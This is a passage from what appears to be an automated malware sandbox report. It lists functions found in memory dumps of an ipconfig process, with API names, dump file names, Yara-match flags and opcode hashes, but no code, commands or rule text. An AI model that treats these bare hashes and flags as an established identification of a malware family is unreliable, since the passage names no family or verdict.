                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41F0BDB2210208ABCB08CF89DC85EEB37ADAF8C754F058208BA0997241C630E8118BA4
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0076C830 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,007671CA,00000002,?,?,00000002,007671CA,FFFFFFFF,vv,vv,00000002,00000000), ref: 0076C875
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 633a8623e59fc3909db9d07ee6c6cb84c23288b149f8502d003803c9fb95ba78
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F0AFB2210208ABCB14DF99DC85EEB77ADEF8C754F158248BE0DA7241D630E8118BA1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ae87f927314535a1e253e4bf80912ecaf50d82804be7f4a1150a5d28f95ccafe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b8322761086d375c9182b6da9002b5209d2a1d6db8329ce14ccaf5f6ba4b962e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae87f927314535a1e253e4bf80912ecaf50d82804be7f4a1150a5d28f95ccafe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3090027521105802D104A5995448656040597E1341F51D421A5014555EC7A588B17171
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c57654b72eb07dddff1151fb2b6f10f87d7efd8909db0a4f950235eb5aef27b7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e5c2128f2fb593074b3372562ab30971ae7df37352a4698b29df6266b2a0e1e0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c57654b72eb07dddff1151fb2b6f10f87d7efd8909db0a4f950235eb5aef27b7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F90026D22305402D184B159544861A040597D2342F91D825A0005558CCA5588796361
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 56f6fa30e7e091137d408d04237c501e6ce58e335c3ffb442730da49d7937952
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 83767ceb6eadd298c17fa5e71ed45c6ba7be86119a8d5e8e26e07c6c1e0ad690
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56f6fa30e7e091137d408d04237c501e6ce58e335c3ffb442730da49d7937952
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5090027532119802D114A1598444716040597D2341F51C821A0814558D87D588B17162
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cb0d93e4596875675984e3c2e1e261e9dccc703ef905b4f9093b96ddd7ad0e05
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7e4f4e7b03f6a4cf3012dd24ef8c956eef3bc805024d37fd8df98ba9b656e37c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb0d93e4596875675984e3c2e1e261e9dccc703ef905b4f9093b96ddd7ad0e05
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F990026522185442D204A5694C54B17040597D1343F51C525A0144554CCA5588716561
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 033096E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: af56a4325680aaa0cc860e74262c8a9522172bed373e2ba82291a2bd2068ad6c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bc99b496f02e7150dd0f1a46be59f15fdf60ca84203383e2595830f4747acb1e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af56a4325680aaa0cc860e74262c8a9522172bed373e2ba82291a2bd2068ad6c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 319002752110DC02D114A159844475A040597D1341F55C821A4414658D87D588B17161
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 033096D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f3780778776c4a0f5e3e2a3c48894f278f141584865b67305b50864feac036c5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 90fdbabdd8668db4a320467f27de4cbbc9499242242efb5948d522a485cda074
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3780778776c4a0f5e3e2a3c48894f278f141584865b67305b50864feac036c5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7190047531105C43D104F15D4444F570405D7F1341F51C437F0114754DC755CC717571
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fb0c27caf54c0a84126b15a7f924b4d6c986793abe7d65acdc439dc09b17d339
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 01971bc8c6c80375cd3bf18976deb0d413707e826a66998de0eac6f1129207ef
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb0c27caf54c0a84126b15a7f924b4d6c986793abe7d65acdc439dc09b17d339
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F09002B521105802D144B1594444756040597D1341F51C421A5054554E87998DF576A5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3acb06122f72c509fb0cfaa49d3dbfef0cd2807a66e2dd57f0b35abdf7a01ed8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: be41b3fa5970d538505fb6743f4e595f8b48b8ac5568e89ce7582b0284b45913
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3acb06122f72c509fb0cfaa49d3dbfef0cd2807a66e2dd57f0b35abdf7a01ed8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67900269231054020149E559064451B0845A7D7391391C425F1406590CC76188756361
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 642a1fcb8080246288ef53ae15f8a7017bb37682ada45a64cc5bcbf10e900daf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9841e8a51884f94bce42ee9a3f7ab6271498ae39f10d32ff11838beaa2bffe45
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 642a1fcb8080246288ef53ae15f8a7017bb37682ada45a64cc5bcbf10e900daf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2690047D33105403010DF55D07445170447D7D73D1351C431F1005550CD771CC717171
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 033099A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e79e8a3b58f4d2e578bb3a4cebddb42f4d6d6fc7069ca62d3f3d583a9260b70e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 79b405e8ec5b24c673e92ef659b25d67b511015359cf9565b006cf5e85bd4d0f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e79e8a3b58f4d2e578bb3a4cebddb42f4d6d6fc7069ca62d3f3d583a9260b70e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C09002A535105842D104A1594454B160405D7E2341F51C425E1054554D8759CC727166
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 033095D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bc24c9a25d09f35c2e4a5db0de8ad4be0a8818bd7e4ce0275ca662f18c2ecd5e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6707f3793c8103e1c0741f5eda2a8c415b4874dd9066eabf183c774d1b19a522
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc24c9a25d09f35c2e4a5db0de8ad4be0a8818bd7e4ce0275ca662f18c2ecd5e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 169002A5212054034109B1594454626440A97E1341B51C431E1004590DC66588B17165
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 84ed074ce555166bd956083468002f69a61cbb08ea52d6560dc4cc2a68118deb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 27acae6d136c49f1955b4eb1d46fd28f5cc2ef533f4ad2b333f687e5602c09ed
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84ed074ce555166bd956083468002f69a61cbb08ea52d6560dc4cc2a68118deb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A190027521105813D115A1594544717040997D1381F91C822A0414558D97968972B161
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 03309840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7d9abe73e2baf0eab04cba2247fd3c6d929fe2ca41032b2e13dd671370d0a570
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7257942cff6029bdd1f49944f75950f4fc05342b762f6f6e793c27d412f7fb66
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d9abe73e2baf0eab04cba2247fd3c6d929fe2ca41032b2e13dd671370d0a570
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC900265252095525549F15944445174406A7E1381791C422A1404950C86669876E661
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00758D90 Relevance: .3, Instructions: 288COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d3e223abd24c910dda4cd1940423b4eafca503fe975d1bc629b38d2977bfa274
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 89c13e8629add85eab63db2cbe46da20b2214ee04fe6d181c12daecdb715f175
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3e223abd24c910dda4cd1940423b4eafca503fe975d1bc629b38d2977bfa274
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAA1A3B1D00209EBDB14DFA4CC46BEFB7B9AF44305F04455DF909A7241EB78AA48CBA5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00758D8F Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 97f92f51b0794e91441b7fe03221545f61afbc7a9a45abcb22311e5e36b32439
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0b1706db78c3386d49026411ff8f2c591da6be4381d30d82a47e323abee8f98b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f92f51b0794e91441b7fe03221545f61afbc7a9a45abcb22311e5e36b32439
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A71C6B1D00219EBDB24DBA0DC46FEFB7B8AF44305F44455DF90962142FB78AA48CBA5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00765260 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
